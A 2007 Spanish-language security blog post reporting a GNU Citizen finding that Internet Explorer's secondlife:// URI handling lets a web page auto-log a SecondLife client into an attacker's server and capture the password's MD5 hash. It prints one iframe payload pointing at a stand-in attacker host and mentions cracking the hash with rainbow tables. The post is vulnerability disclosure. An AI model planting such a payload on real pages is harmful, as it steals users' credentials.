Internet Explorer facilita robo de identidad en SecondLife

Publicado: septiembre 18, 2007 en Articulos, Vulnerabilidades

GNU Citizen acaba de hacer público un nuevo uso para el ya conocido “bug compartido”, del que Microsoft se lava las manos y asegura no tener nada que ver. En fin, mediante lo publicado por GNU Citizen un atacante puede hacerse con los datos de un usuario de SecondLife sin necesitad de una gran interacción, solo hace falta visitar una web con cierto código utilizando para ello Internet Explorer.

Mediante una llamada a secondlife:// el atacante puede ejecutar el cliente de SecondLife iniciando sesión automáticamente (-autologin) contra la URL especificada por el victimario (-loginuri), de esta forma mediante una llamada XML-RPC uno puede obtener el hash MD5 de la clave del usuario.

<iframe src=’secondlife://” -autologin -loginuri “http://atacante.com/sl/record-login.php’></iframe&gt;

El hash MD5 puede ser utilizado para conectarse a SL con la sesión robada o bien obtener su valor haciendo uso de las rainbow tables.

Enlaces relacionados:
http://www.gnucitizen.org/blog/ie-pwns-secondlife

# Martín Aberastegue
# Rynho Zeros Web (http://www.rzw.com.ar)
# Seguridad Informática

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s